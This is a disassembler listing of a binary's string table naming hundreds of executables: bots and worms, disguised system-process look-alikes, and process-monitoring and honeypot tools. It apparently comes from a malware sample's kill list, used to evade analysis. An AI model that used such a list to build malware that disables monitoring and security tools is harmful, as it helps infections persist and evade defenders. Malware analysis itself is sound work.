aDcomd_exe db 'DCOMD.EXE',0 ; DATA XREF: .text:00448798�o
align 4
aUniversal_exe db 'UNIVERSAL.EXE',0 ; DATA XREF: .text:00448794�o
align 4
aUtils32_exe db 'UTILS32.EXE',0 ; DATA XREF: .text:00448790�o
aR00tkit_exe db 'R00TKIT.EXE',0 ; DATA XREF: .text:0044878C�o
aRk_exe db 'RK.EXE',0 ; DATA XREF: .text:00448788�o
align 4
aRootkit_exe db 'ROOTKIT.EXE',0 ; DATA XREF: .text:00448784�o
aT00lkit_exe db 'T00LKIT.EXE',0 ; DATA XREF: .text:00448780�o
aUpdates_exe db 'UPDATES.EXE',0 ; DATA XREF: .text:0044877C�o
aExe32_exe db 'EXE32.EXE',0 ; DATA XREF: .text:00448778�o
align 4
aExe_exe db 'EXE.EXE',0 ; DATA XREF: .text:00448774�o
aDllhst_exe db 'DLLHST.EXE',0 ; DATA XREF: .text:0044876C�o
align 4
aWindll_exe db 'WINDLL.EXE',0 ; DATA XREF: .text:00448768�o
align 4
aGsec_exe db 'GSEC.EXE',0 ; DATA XREF: .text:00448764�o
align 10h
aRunbatch_exe db 'RUNBATCH.EXE',0 ; DATA XREF: .text:00448760�o
align 10h
aLoader32_exe db 'LOADER32.EXE',0 ; DATA XREF: .text:0044875C�o
align 10h
aWebex_exe db 'WEBEX.EXE',0 ; DATA XREF: .text:00448758�o
align 4
aDowner_exe db 'DOWNER.EXE',0 ; DATA XREF: .text:00448754�o
align 4
aUrx_exe db 'URX.EXE',0 ; DATA XREF: .text:00448750�o
aPnp_exe db 'PNP.EXE',0 ; DATA XREF: .text:0044874C�o
aAsn_exe db 'ASN.EXE',0 ; DATA XREF: .text:00448748�o
aUrxbot_exe db 'URXBOT.EXE',0 ; DATA XREF: .text:00448744�o
align 4
aForbot_exe db 'FORBOT.EXE',0 ; DATA XREF: .text:00448740�o
align 4
aAgobotsvc_exe db 'AGOBOTSVC.EXE',0 ; DATA XREF: .text:0044873C�o
align 4
aWonk_exe db 'WONK.EXE',0 ; DATA XREF: .text:00448738�o
align 4
aPb_exe db 'PB.EXE',0 ; DATA XREF: .text:00448734�o
align 4
aAg32_exe db 'AG32.EXE',0 ; DATA XREF: .text:00448730�o
align 4
aAgo_exe db 'AGO.EXE',0 ; DATA XREF: .text:00448728�o
aA_exe db 'A.EXE',0 ; DATA XREF: .text:00448724�o
; .text:004488B4�o
align 4
aPhatbot_exe db 'PHATBOT.EXE',0 ; DATA XREF: .text:00448720�o
aAgobot3_exe db 'AGOBOT3.EXE',0 ; DATA XREF: .text:0044871C�o
aAgobot_exe db 'AGOBOT.EXE',0 ; DATA XREF: .text:00448718�o
align 4
aSyst3m33r_exe db 'SYST3M33R.EXE',0 ; DATA XREF: .text:00448714�o
align 4
aWebdownloader_ db 'WEBDOWNLOADER.EXE',0 ; DATA XREF: .text:00448710�o
align 10h
aWebx_exe db 'WEBX.EXE',0 ; DATA XREF: .text:0044870C�o
align 4
aXftp_exe db 'XFTP.EXE',0 ; DATA XREF: .text:00448708�o
align 4
aWinnet_exe db 'WINNET.EXE',0 ; DATA XREF: .text:00448704�o
align 4
aWinreg32_exe db 'WINREG32.EXE',0 ; DATA XREF: .text:00448700�o
align 4
aConvertxdccfil db 'CONVERTXDCCFILE.EXE',0 ; DATA XREF: .text:004486FC�o
; .text:004488E0�o
aMsserv_exe db 'MSSERV.EXE',0 ; DATA XREF: .text:004486F8�o
align 4
aS0cks_exe db 'S0CKS.EXE',0 ; DATA XREF: .text:004486F4�o
align 10h
aSockets_exe db 'SOCKETS.EXE',0 ; DATA XREF: .text:004486F0�o
aSox_exe db 'SOX.EXE',0 ; DATA XREF: .text:004486EC�o
aSocks_exe db 'SOCKS.EXE',0 ; DATA XREF: .text:004486E8�o
align 10h
aClass101_exe db 'CLASS101.EXE',0 ; DATA XREF: .text:004486E4�o
align 10h
a101_exe db '101.EXE',0 ; DATA XREF: .text:004486E0�o
aMsn_exe db 'MSN.EXE',0 ; DATA XREF: .text:004486DC�o
aHax_exe db 'HAX.EXE',0 ; DATA XREF: .text:004486D8�o
aT_bat db 'T.BAT',0 ; DATA XREF: .text:004486D4�o
align 10h
aSdbot05c_exe db 'SDBOT05C.EXE',0 ; DATA XREF: .text:004486D0�o
align 10h
aSdbot05b_exe db 'SDBOT05B.EXE',0 ; DATA XREF: .text:004486CC�o
align 10h
aSd_exe db 'SD.EXE',0 ; DATA XREF: .text:004486C8�o
align 4
aSdbot_exe db 'SDBOT.EXE',0 ; DATA XREF: .text:004486C4�o
align 4
aIrxdcc_exe db 'IRXDCC.EXE',0 ; DATA XREF: .text:004486C0�o
align 10h
aOffer_exe db 'OFFER.EXE',0 ; DATA XREF: .text:004486BC�o
align 4
aIrbot_exe db 'IRBOT.EXE',0 ; DATA XREF: .text:004486B8�o
align 4
aIroffer_exe db 'IROFFER.EXE',0 ; DATA XREF: .text:004486B4�o
aRcc_exe db 'RCC.EXE',0 ; DATA XREF: .text:004486B0�o
aWinmrt32_exe db 'WINMRT32.EXE',0 ; DATA XREF: .text:004486AC�o
align 4
aWinmrt_exe db 'WINMRT.EXE',0 ; DATA XREF: .text:004486A8�o
align 4
aAntispy_exe db 'ANTISPY.EXE',0 ; DATA XREF: .text:004486A4�o
aMsantispy_exe db 'MSANTISPY.EXE',0 ; DATA XREF: .text:004486A0�o
align 4
aDrweb32_exe db 'DRWEB32.EXE',0 ; DATA XREF: .text:0044869C�o
aKeylogg_exe db 'KEYLOGG.EXE',0 ; DATA XREF: .text:00448698�o
aKeylog_exe db 'KEYLOG.EXE',0 ; DATA XREF: .text:00448694�o
align 4
aKeylogger_exe db 'KEYLOGGER.EXE',0 ; DATA XREF: .text:00448690�o
align 4
aRdrbs073_exe db 'RDRBS073.EXE',0 ; DATA XREF: .text:00448688�o
align 4
aBdcli073_exe db 'BDCLI073.EXE',0 ; DATA XREF: .text:00448684�o
align 4
aHxdef073_exe db 'HXDEF073.EXE',0 ; DATA XREF: .text:00448680�o
align 4
aHxgold_exe db 'HXGOLD.EXE',0 ; DATA XREF: .text:0044867C�o
align 4
aHxdofena_exe db 'HXDOFENA.EXE',0 ; DATA XREF: .text:00448678�o
; .text:0044868C�o ...
align 4
aRdrbs100_exe db 'RDRBS100.EXE',0 ; DATA XREF: .text:00448674�o
align 4
aBdcli100_exe db 'BDCLI100.EXE',0 ; DATA XREF: .text:00448670�o
align 4
aHxdef100_exe db 'HXDEF100.EXE',0 ; DATA XREF: .text:0044866C�o
align 4
aXd_exe db 'XD.EXE',0 ; DATA XREF: .text:00448664�o
align 4
aXdcckit_exe db 'XDCCKIT.EXE',0 ; DATA XREF: .text:00448660�o
aKit_exe db 'KIT.EXE',0 ; DATA XREF: .text:0044865C�o
aRunthis_exe db 'RUNTHIS.EXE',0 ; DATA XREF: .text:00448658�o
aDiabl0_exe db 'DIABL0.EXE',0 ; DATA XREF: .text:00448654�o
align 4
aDiablo_exe db 'DIABLO.EXE',0 ; DATA XREF: .text:00448650�o
align 4
a6_exe db '6.EXE',0 ; DATA XREF: .text:0044864C�o
align 4
a1_exe db '1.EXE',0 ; DATA XREF: .text:00448648�o
align 4
aOwned_exe db 'OWNED.EXE',0 ; DATA XREF: .text:00448644�o
align 10h
aOmfglol_exe db 'OMFGLOL.EXE',0 ; DATA XREF: .text:00448640�o
aDoor_exe db 'DOOR.EXE',0 ; DATA XREF: .text:0044863C�o
align 4
aBd_exe db 'BD.EXE',0 ; DATA XREF: .text:00448638�o
align 10h
aSub7_exe db 'SUB7.EXE',0 ; DATA XREF: .text:00448634�o
align 4
aTrojan_exe db 'TROJAN.EXE',0 ; DATA XREF: .text:00448630�o
align 4
aHoney_exe db 'HONEY.EXE',0 ; DATA XREF: .text:0044862C�o
align 4
aRoo32_exe db 'ROO32.EXE',0 ; DATA XREF: .text:00448628�o
align 10h
aRoo_exe db 'ROO.EXE',0 ; DATA XREF: .text:00448624�o
aSysd32_exe db 'SYSD32.EXE',0 ; DATA XREF: .text:00448620�o
align 4
aAntibotty_exe db 'ANTIBOTTY.EXE',0 ; DATA XREF: .text:0044861C�o
align 4
aSelebek_exe db 'SELEBEK.EXE',0 ; DATA XREF: .text:00448618�o
aSebek_exe db 'SEBEK.EXE',0 ; DATA XREF: .text:00448614�o
align 4
aHoneywall_exe db 'HONEYWALL.EXE',0 ; DATA XREF: .text:00448610�o
align 4
aHoneyd_exe db 'HONEYD.EXE',0 ; DATA XREF: .text:0044860C�o
align 4
aVirus32_exe db 'VIRUS32.EXE',0 ; DATA XREF: .text:00448608�o
aVirus_exe db 'VIRUS.EXE',0 ; DATA XREF: .text:00448604�o
align 10h
aTq_exe db 'TQ.EXE',0 ; DATA XREF: .text:00448600�o
align 4
aBeast_exe db 'BEAST.EXE',0 ; DATA XREF: .text:004485FC�o
align 4
aAcc3pt_exe db 'ACC3PT.EXE',0 ; DATA XREF: .text:004485F8�o
align 10h
aMykralor_exe db 'MYKRALOR.EXE',0 ; DATA XREF: .text:004485F4�o
align 10h
aKralor_exehaxo db 'KRALOR.EXEHAXOR.EXE',0 ; DATA XREF: .text:004485F0�o
aWinslave_exe db 'WINSLAVE.EXE',0 ; DATA XREF: .text:004485EC�o
align 4
aSlave32_exe db 'SLAVE32.EXE',0 ; DATA XREF: .text:004485E8�o
aSlave_exe db 'SLAVE.EXE',0 ; DATA XREF: .text:004485E4�o
align 4
aWinmaster_exe db 'WINMASTER.EXE',0 ; DATA XREF: .text:004485E0�o
align 4
aDftpd_exe db 'DFTPD.EXE',0 ; DATA XREF: .text:004485DC�o
align 4
aTemp_exe db 'TEMP.EXE',0 ; DATA XREF: .text:004485D8�o
align 4
aStub_exe db 'STUB.EXE',0 ; DATA XREF: .text:004485D4�o
align 10h
aWrapper_exe db 'WRAPPER.EXE',0 ; DATA XREF: .text:004485D0�o
aRdr32_exe db 'RDR32.EXE',0 ; DATA XREF: .text:004485CC�o
align 4
aCiao_exe db 'CIAO.EXE',0 ; DATA XREF: .text:004485C8�o
align 4
aXtc_exe db 'XTC.EXE',0 ; DATA XREF: .text:004485C4�o
aWsg32_exe db 'WSG32.EXE',0 ; DATA XREF: .text:004485C0�o
; .text:004488D4�o
align 4
aRadmin22_exe db 'RADMIN22.EXE',0 ; DATA XREF: .text:004485BC�o
align 4
aRadmin21_exe db 'RADMIN21.EXE',0 ; DATA XREF: .text:004485B8�o
align 4
aRview_exe db 'RVIEW.EXE',0 ; DATA XREF: .text:004485B4�o
align 4
aNi_exe db 'NI.EXE',0 ; DATA XREF: .text:004485B0�o
align 4
aTaskhider_exe db 'TASKHIDER.EXE',0 ; DATA XREF: .text:004485AC�o
align 4
aMswin32 db 'MSWIN32',0 ; DATA XREF: .text:004485A4�o
aFoods_exe db 'FOODS.EXE',0 ; DATA XREF: .text:004485A0�o
align 10h
aPostcard_exe db 'POSTCARD.EXE',0 ; DATA XREF: .text:0044859C�o
align 10h
aMsdev32_exe db 'MSDEV32.EXE',0 ; DATA XREF: .text:00448598�o
aRun0nce_exe db 'RUN0NCE.EXE',0 ; DATA XREF: .text:00448594�o
aSpools32_exe db 'SPOOLS32.EXE',0 ; DATA XREF: .text:00448590�o
align 4
aSpool32_exe db 'SPOOL32.EXE',0 ; DATA XREF: .text:0044858C�o
aCrss32_exe db 'CRSS32.EXE',0 ; DATA XREF: .text:00448588�o
align 10h
aIexploree_exe db 'IEXPLOREE.EXE',0 ; DATA XREF: .text:00448584�o
align 10h
aQq_exe db 'QQ.EXE',0 ; DATA XREF: .text:00448580�o
align 4
aWindows_update db 'WINDOWS_UPDATER01.EXE',0 ; DATA XREF: .text:0044857C�o
align 10h
aAddiq32_exe db 'ADDIQ32.EXE',0 ; DATA XREF: .text:00448574�o
aSysinfo_exe db 'SYSINFO.EXE',0 ; DATA XREF: .text:00448570�o
aWuamkoppnp_exe db 'WUAMKOPPNP.EXE',0 ; DATA XREF: .text:00448568�o
align 4
aScrh0st_exe db 'SCRH0ST.EXE',0 ; DATA XREF: .text:00448564�o
aSvch0st32_exe db 'SVCH0ST32.EXE',0 ; DATA XREF: .text:00448560�o
align 4
aSvhosts_exe db 'SVHOSTS.EXE',0 ; DATA XREF: .text:0044855C�o
aSvhost_exe db 'SVHOST.EXE',0 ; DATA XREF: .text:00448558�o
align 4
aIexpl0re_exe db 'IEXPL0RE.EXE',0 ; DATA XREF: .text:00448550�o
align 4
aSvc_exe db 'SVC.EXE',0 ; DATA XREF: .text:0044854C�o
; .text:004488F8�o
aZf_exe db 'ZF.EXE',0 ; DATA XREF: .text:00448544�o
align 4
aZfr_exe db 'ZFR.EXE',0 ; DATA XREF: .text:00448540�o
aWins32_exe db 'WINS32.EXE',0 ; DATA XREF: .text:0044853C�o
align 10h
aWuamgre_exe db 'WUAMGRE.EXE',0 ; DATA XREF: .text:00448538�o
aScrhost32_exe db 'SCRHOST32.EXE',0 ; DATA XREF: .text:00448530�o
align 4
aSassere_exe db 'SASSERE.EXE',0 ; DATA XREF: .text:0044852C�o
aSasser_exe db 'SASSER.EXE',0 ; DATA XREF: .text:00448528�o
align 4
aBlast_exe db 'BLAST.EXE',0 ; DATA XREF: .text:00448524�o
align 10h
aMsblast_exe db 'MSBLAST.EXE',0 ; DATA XREF: .text:00448520�o
aHiderun_exe db 'HIDERUN.EXE',0 ; DATA XREF: .text:00448510�o
aTcpshell_exe db 'TCPSHELL.EXE',0 ; DATA XREF: .text:00448508�o
align 4
aXssh_exe db 'XSSH.EXE',0 ; DATA XREF: .text:00448504�o
align 4
aIcmd_exe db 'ICMD.EXE',0 ; DATA XREF: .text:00448500�o
; .text:00448668�o
align 10h
aFtpit_exe db 'FTPIT.EXE',0 ; DATA XREF: .text:004484FC�o
align 4
aNaab_exe db 'NAAB.EXE',0 ; DATA XREF: .text:004484F8�o
align 4
aPusu_exe db 'PUSU.EXE',0 ; DATA XREF: .text:004484F4�o
align 4
aTbar_exe db 'TBAR.EXE',0 ; DATA XREF: .text:004484F0�o
align 10h
aArabian_exe db 'ARABIAN.EXE',0 ; DATA XREF: .text:004484EC�o
aArabz_exe db 'ARABZ.EXE',0 ; DATA XREF: .text:004484E8�o
align 4
aDgjdjg_exe db 'DGJDJG.EXE',0 ; DATA XREF: .text:004484E4�o
align 4
aOooo_exe db 'OOOO.EXE',0 ; DATA XREF: .text:004484E0�o
align 10h
aOoooo_exe db 'OOOOO.EXE',0 ; DATA XREF: .text:004484DC�o
align 4
aOp_exe db 'OP.EXE',0 ; DATA XREF: .text:004484D8�o
align 4
a2pac_exe db '2PAC.EXE',0 ; DATA XREF: .text:004484D4�o
align 10h
aLogix_exe db 'LOGIX.EXE',0 ; DATA XREF: .text:004484D0�o
align 4
aCash7oc_jpg db 'CASH7OC.JPG',0 ; DATA XREF: .text:004484CC�o
a0cash_exe db '0CASH.EXE',0 ; DATA XREF: .text:004484C8�o
align 4
aCash_exe db 'CASH.EXE',0 ; DATA XREF: .text:004484C4�o
align 10h
aAoautoupdatena db 'AOAUTOUPDATENAV.EXE',0 ; DATA XREF: .text:004484C0�o
aXdcc_install_e db 'XDCC_INSTALL.EXEDD.EXE',0 ; DATA XREF: .text:004484BC�o
align 4
aNetworkactivpi db 'NETWORKACTIVPIAFCTMV1.5.EXE',0 ; DATA XREF: .text:004484B8�o
aPexplorer_exe db 'PEXPLORER.EXE',0 ; DATA XREF: .text:004484B4�o
align 4
aProcdump32_exe db 'PROCDUMP32.EXE',0 ; DATA XREF: .text:004484B0�o
align 4
aProcdump_exe db 'PROCDUMP.EXE',0 ; DATA XREF: .text:004484AC�o
align 4
aTlist_exe db 'TLIST.EXE',0 ; DATA XREF: .text:004484A8�o
align 4
aFport_exe db 'FPORT.EXE',0 ; DATA XREF: .text:004484A4�o
align 10h
aFilemon_exe db 'FILEMON.EXE',0 ; DATA XREF: .text:004484A0�o
aPortmon_exe db 'PORTMON.EXE',0 ; DATA XREF: .text:0044849C�o
aProcexp_exe db 'PROCEXP.EXE',0 ; DATA XREF: .text:00448498�o
aRegmon_exe db 'REGMON.EXE',0 ; DATA XREF: .text:00448494�o
align 10h
aWinsniff_exe db 'WINSNIFF.EXE',0 ; DATA XREF: .text:00448490�o
align 10h
aHostmon_exe db 'HOSTMON.EXE',0 ; DATA XREF: .text:0044848C�o
aSharemon_exe db 'SHAREMON.EXE',0 ; DATA XREF: .text:00448488�o
align 4
aTcpstats_exe db 'TCPSTATS.EXE',0 ; DATA XREF: .text:00448484�o
align 4
aTcpstat_exe db 'TCPSTAT.EXE',0 ; DATA XREF: .text:00448480�o
aTcpmon_exe db 'TCPMON.EXE',0 ; DATA XREF: .text:0044847C�o
align 4
aTcpdump_exe db 'TCPDUMP.EXE',0 ; DATA XREF: .text:00448478�o
aTcpviewpro_exe db 'TCPVIEWPRO.EXE',0 ; DATA XREF: .text:00448474�o
align 10h
aTcpview_exe db 'TCPVIEW.EXE',0 ; DATA XREF: .text:00448470�o
aZz_exe db 'ZZ.EXE',0 ; DATA XREF: .text:0044846C�o
align 4
aDbot_exe db 'DBOT.EXE',0 ; DATA XREF: .text:00448468�o
align 10h
aHbot_exe db 'HBOT.EXE',0 ; DATA XREF: .text:00448464�o
align 4
aA_bat db 'A.BAT',0 ; DATA XREF: .text:00448460�o
align 4
aAg_exe db 'AG.EXE',0 ; DATA XREF: .text:0044845C�o
; .text:0044872C�o
align 4
aRundil_exe db 'RUNDIL.EXE',0 ; DATA XREF: .text:00448454�o
align 4
aWinpooch_exe db 'WINPOOCH.EXE',0 ; DATA XREF: .text:00448450�o
align 4
aWinmpat_exe db 'WINMPAT.EXE',0 ; DATA XREF: .text:00448448�o
aMsssmsngr6417_ db 'MSSSMSNGR6417.EXE',0 ; DATA XREF: .text:00448444�o
align 4
aWaucult_exe db 'WAUCULT.EXE',0 ; DATA XREF: .text:00448440�o
aJswtss_exe db 'JSWTSS.EXE',0 ; DATA XREF: .text:0044843C�o
align 10h
aSvcvhost_exe db 'SVCVHOST.EXE',0 ; DATA XREF: .text:00448438�o
align 10h
aRp5_exe db 'RP5.EXE',0 ; DATA XREF: .text:00448434�o
aBsdmpldrvr642_ db 'BSDMPLDRVR642.EXE',0 ; DATA XREF: .text:00448430�o
align 4
aMyhost_exe db 'MYHOST.EXE',0 ; DATA XREF: .text:0044842C�o
align 4
aMswins_exe db 'MSWINS.EXE',0 ; DATA XREF: .text:00448428�o
align 4
aWindowsvista_e db 'WINDOWSVISTA.EXE',0 ; DATA XREF: .text:00448424�o
align 4
aQkkku_exe db 'QKKKU.EXE',0 ; DATA XREF: .text:00448420�o
align 4
aMessengerr_exe db 'MESSENGERR.EXE',0 ; DATA XREF: .text:0044841C�o
align 4
aEraseme_exe db 'ERASEME.EXE',0 ; DATA XREF: .text:00448418�o
aTskmagr_exe db 'TSKMAGR.EXE',0 ; DATA XREF: .text:00448414�o
aCmh_exe db 'CMH.EXE',0 ; DATA XREF: .text:00448410�o
aSmsc_exe db 'SMSC.EXE',0 ; DATA XREF: .text:0044840C�o
align 10h
aQtask_exe db 'QTASK.EXE',0 ; DATA XREF: .text:00448408�o
align 4
aWuaumqr1_exe db 'WUAUMQR1.EXE',0 ; DATA XREF: .text:00448404�o
align 4
aWinlogin_exe db 'WINLOGIN.EXE',0 ; DATA XREF: .text:00448400�o
align 4
aInternet_exe db 'INTERNET.EXE',0 ; DATA XREF: .text:004483FC�o
align 4
aCtfmom_exe db 'CTFMOM.EXE',0 ; DATA XREF: .text:004483F4�o
align 4
aWindowantasdiv db 'WINDOWANTASDIVRI.EXE',0 ; DATA XREF: .text:004483F0�o
align 10h
aSchost_exe db 'SCHOST.EXE',0 ; DATA XREF: .text:004483EC�o
align 4
aNewbot_exe db 'NEWBOT.EXE',0 ; DATA XREF: .text:004483E8�o
align 4
aIi_exe db 'II.EXE',0 ; DATA XREF: .text:004483E4�o
align 10h
aMssdev_exe db 'MSSDEV.EXE',0 ; DATA XREF: .text:004483E0�o
align 4
aIshost_exe db 'ISHOST.EXE',0 ; DATA XREF: .text:004483DC�o
align 4
aIsmini_exe db 'ISMINI.EXE',0 ; DATA XREF: .text:004483D8�o
align 4
aNl210_bat db 'NL210.BAT',0
align 10h
aWinupdtsrv_exe db 'WINUPDTSRV.EXE',0
align 10h
aMsn_update_exe db 'MSN_UPDATE.EXE',0
align 10h
aSysmonxp_exe db 'SYSMONXP.EXE',0
align 10h
aSvcdata_exe db 'SVCDATA.EXE',0
aReg32_exe db 'REG32.EXE',0
align 4
aDll32_exe db 'DLL32.EXE',0
align 4
aIexplores_exe db 'IEXPLORES.EXE',0
align 4
aSusp_exe db 'SUSP.EXE',0
align 10h
aSpool_exe db 'SPOOL.EXE',0
align 4
a568_exe db '568.EXE',0
aCcupdate_exe db 'CCUPDATE.EXE',0
align 4
aLoadadv642_exe db 'LOADADV642.EXE',0
align 4
aSsc_exe db 'SSC.EXE',0
aVcmon_exe db 'VCMON.EXE',0
align 4
aMstskmgr_exe db 'MSTSKMGR.EXE',0
align 4
aServlces_exe db 'SERVLCES.EXE',0
align 4
aServlce_exe db 'SERVLCE.EXE',0
aMslaugh_exe db 'MSLAUGH.EXE',0
aMsnmgr12_exe db 'MSNMGR12.EXE',0
align 10h
aWinform32_exe db 'WINFORM32.EXE',0
align 10h
aDllx32_exe db 'DLLX32.EXE',0
align 4
aRp_exe db 'RP.EXE',0
align 4
aGecko_exe db 'GECKO.EXE',0
align 10h
aReptile_exe db 'REPTILE.EXE',0
aLrsys_exe db 'LRSYS.EXE',0
align 4
aSrshost_exe db 'SRSHOST.EXE',0
aMsdos_exe db 'MSDOS.EXE',0
align 10h
aWumgre_exe db 'WUMGRE.EXE',0
align 4
aWumgr_exe db 'WUMGR.EXE',0
align 4
aD3dupdate_exe db 'D3DUPDATE.EXE',0
align 4
aI11r54n4_exe db 'I11R54N4.EXE',0
align 4
aBbeagle32_exe db 'BBEAGLE32.EXE',0
align 4
aBbeagle2_exe db 'BBEAGLE2.EXE',0
align 4
aBbeagle_exe db 'BBEAGLE.EXE',0 ; DATA XREF: .text:00448340�o
aBeagle_exe db 'BEAGLE.EXE',0 ; DATA XREF: .text:0044833C�o
align 10h
aSsate_exe db 'SSATE.EXE',0 ; DATA XREF: .text:00448338�o
align 4
aVhost_exe db 'VHOST.EXE',0 ; DATA XREF: .text:00448334�o
align 4
aIeserver_exe db 'IESERVER.EXE',0 ; DATA XREF: .text:00448330�o
align 4
aDsrss_exe db 'DSRSS.EXE',0 ; DATA XREF: .text:0044832C�o
align 4
aSvvosts_exe db 'SVVOSTS.EXE',0 ; DATA XREF: .text:00448328�o
aUpdat_exe db 'UPDAT.EXE',0 ; DATA XREF: .text:00448324�o
align 4
aServicesmsi_ex db 'SERVICESMSI.EXE',0 ; DATA XREF: .text:00448320�o
aSpoolmgr_exe db 'SPOOLMGR.EXE',0 ; DATA XREF: .text:0044831C�o
align 4
aWinhelp_exe_0 db 'WINHELP.EXE',0 ; DATA XREF: .text:00448318�o
; .text:00448770�o
aNttdll_exe db 'NTTDLL.EXE',0 ; DATA XREF: .text:00448314�o
align 4
aIrun4_exe db 'IRUN4.EXE',0 ; DATA XREF: .text:00448310�o
align 10h
aSys_xp_exe db 'SYS_XP.EXE',0 ; DATA XREF: .text:0044830C�o
align 4
aSvcost_exe db 'SVCOST.EXE',0 ; DATA XREF: .text:00448308�o
; .text:00448554�o
align 4
aWinusb32_exe db 'WINUSB32.EXE',0 ; DATA XREF: .text:00448304�o
align 4
aWinusb_exe db 'WINUSB.EXE',0 ; DATA XREF: .text:00448300�o
align 4
aWinspooler_exe db 'WINSPOOLER.EXE',0 ; DATA XREF: .text:004482FC�o
align 4
aWinsock_exe db 'WINSOCK.EXE',0 ; DATA XREF: .text:004482F8�o
aIpcmgr_exe db 'IPCMGR.EXE',0 ; DATA XREF: .text:004482F4�o
align 4
aWuamgrd3_exe db 'WUAMGRD3.EXE',0 ; DATA XREF: .text:004482F0�o
align 4
aWuamgrd_exe db 'WUAMGRD.EXE',0 ; DATA XREF: .text:004482EC�o
; .text:00448534�o
aWuamgr_exe db 'WUAMGR.EXE',0 ; DATA XREF: .text:004482E8�o
align 4
aLansas_exe db 'LANSAS.EXE',0 ; DATA XREF: .text:004482E4�o
align 10h
aXml32_exe db 'XML32.EXE',0 ; DATA XREF: .text:004482E0�o
align 4
aXml_exe db 'XML.EXE',0 ; DATA XREF: .text:004482DC�o
aWinz_exe db 'WINZ.EXE',0 ; DATA XREF: .text:004482D8�o
align 10h
aWinsys_exe db 'WINSYS.EXE',0 ; DATA XREF: .text:004482D4�o
align 4
aWgavm_exe db 'WGAVM.EXE',0
align 4
aStdrun3_exe db 'STDRUN3.EXE',0
aTaskdir_exe db 'TASKDIR.EXE',0
aPmsngr_exe db 'PMSNGR.EXE',0
align 4
aTaskmsg_exe db 'TASKMSG.EXE',0
aWdfmgr32_exe db 'WDFMGR32.EXE',0
align 4
aNotaped_exe db 'NOTAPED.EXE',0
aCsrs_exe db 'CSRS.EXE',0
align 10h
aWincomm_exe db 'WINCOMM.EXE',0
aWinocx_exe db 'WINOCX.EXE',0
align 4
aWinlolx_exe db 'WINLOLX.EXE',0
aJavanet_exe db 'JAVANET.EXE',0
aMaxd641_exe db 'MAXD641.EXE',0
aMs_exe db 'MS.EXE',0 ; DATA XREF: .text:00448294�o
align 4
aService_exe db 'SERVICE.EXE',0 ; DATA XREF: .text:00448290�o
aMsnlive_exe db 'MSNLIVE.EXE',0 ; DATA XREF: .text:0044828C�o
aWip_exe db 'WIP.EXE',0 ; DATA XREF: .text:00448288�o
a666_exe db '666.EXE',0 ; DATA XREF: .text:00448284�o
aMybot_exe db 'MYBOT.EXE',0 ; DATA XREF: .text:00448280�o
align 4
aMyt0b_exe db 'MYT0B.EXE',0 ; DATA XREF: .text:0044827C�o
align 4
aHellmsn_exe db 'HELLMSN.EXE',0 ; DATA XREF: .text:00448278�o
aFunny_pic_scr db 'FUNNY_PIC.SCR',0 ; DATA XREF: .text:00448274�o
align 10h
aMsgm_exe db 'MSGM.EXE',0 ; DATA XREF: .text:00448270�o
align 4
aMsgmr_exe db 'MSGMR.EXE',0 ; DATA XREF: .text:0044826C�o
align 4
aWinpadg_exe db 'WINPADG.EXE',0 ; DATA XREF: .text:00448268�o
aHide_exe db 'HIDE.EXE',0 ; DATA XREF: .text:00448264�o
; .text:0044851C�o ...
align 10h
aHidden_exe db 'HIDDEN.EXE',0 ; DATA XREF: .text:00448260�o
; .text:00448518�o
align 4
aHidden32_exe db 'HIDDEN32.EXE',0 ; DATA XREF: .text:0044825C�o
; .text:0044850C�o ...
align 4
aHiddenrun_exe db 'HIDDENRUN.EXE',0 ; DATA XREF: .text:00448258�o
align 4
aWindowsp_exe db 'WINDOWSP.EXE',0 ; DATA XREF: .text:00448254�o
align 4
aWinsystem_exe db 'WINSYSTEM.EXE',0 ; DATA XREF: .text:0044824C�o
align 4
aSystem32_exe db 'SYSTEM32.EXE',0 ; DATA XREF: .text:00448248�o
; .text:0044890C�o
align 4
aSystem_exe db 'SYSTEM.EXE',0 ; DATA XREF: .text:00448244�o
; .text:00448908�o
align 4
aWindow_exe db 'WINDOW.EXE',0 ; DATA XREF: .text:0044823C�o
align 4
aWindows_exe db 'WINDOWS.EXE',0 ; DATA XREF: .text:00448238�o
aSaveuninst_exe db 'SAVEUNINST.EXE',0 ; DATA XREF: .text:00448234�o
align 10h
aWups_exe db 'WUPS.EXE',0 ; DATA XREF: .text:00448230�o
align 4
aSvcshoter_exe db 'SVCSHOTER.EXE',0 ; DATA XREF: .text:0044822C�o
align 4
aWinmap_exe db 'WINMAP.EXE',0 ; DATA XREF: .text:00448228�o
align 4
aMydocs_exe db 'MYDOCS.EXE',0 ; DATA XREF: .text:00448224�o
align 4
aWinb_exe db 'WINB.EXE',0 ; DATA XREF: .text:00448220�o
align 10h
aWinnamps_exe db 'WINNAMPS.EXE',0 ; DATA XREF: .text:0044821C�o
align 10h
aCmrss_dll_exe db 'CMRSS.DLL.EXE',0 ; DATA XREF: .text:00448218�o
align 10h
aWin_exe db 'WIN.EXE',0 ; DATA XREF: .text:00448214�o
aWin32_exe db 'WIN32.EXE',0 ; DATA XREF: .text:00448210�o
align 4
aWinis_exe db 'WINIS.EXE',0 ; DATA XREF: .text:0044820C�o
align 10h
aMsnmsg_exe db 'MSNMSG.EXE',0 ; DATA XREF: .text:00448208�o
align 4
aMsnmsgs_exe db 'MSNMSGS.EXE',0 ; DATA XREF: .text:00448204�o
aXpfirewall_exe db 'XPFIREWALL.EXE',0 ; DATA XREF: .text:00448200�o
align 4
aWfdmgr_exe db 'WFDMGR.EXE',0 ; DATA XREF: .text:004481FC�o
align 4
aTaskm0n_exe db 'TASKM0N.EXE',0 ; DATA XREF: .text:004481F8�o
aTaskgmr_exe db 'TASKGMR.EXE',0 ; DATA XREF: .text:004481F4�o
aWincfg32_exe db 'WINCFG32.EXE',0 ; DATA XREF: .text:004481F0�o
align 4
aSyscfg32_exe db 'SYSCFG32.EXE',0 ; DATA XREF: .text:004481EC�o
align 4
aSyscfg16_exe db 'SYSCFG16.EXE',0 ; DATA XREF: .text:004481E8�o
align 4
aSystra_exe db 'SYSTRA.EXE',0 ; DATA XREF: .text:004481E4�o
align 4
aRpc32_exe db 'RPC32.EXE',0 ; DATA XREF: .text:004481E0�o
align 4
aMsmgrxp_exe db 'MSMGRXP.EXE',0 ; DATA XREF: .text:004481DC�o
aSuhoy_exe db 'SUHOY.EXE',0 ; DATA XREF: .text:004481D4�o
align 4
aPicx_exe db 'PICX.EXE',0 ; DATA XREF: .text:004481D0�o
align 4
aMathchk_exe db 'MATHCHK.EXE',0 ; DATA XREF: .text:004481CC�o
aRundll16_exe db 'RUNDLL16.EXE',0 ; DATA XREF: .text:004481C8�o
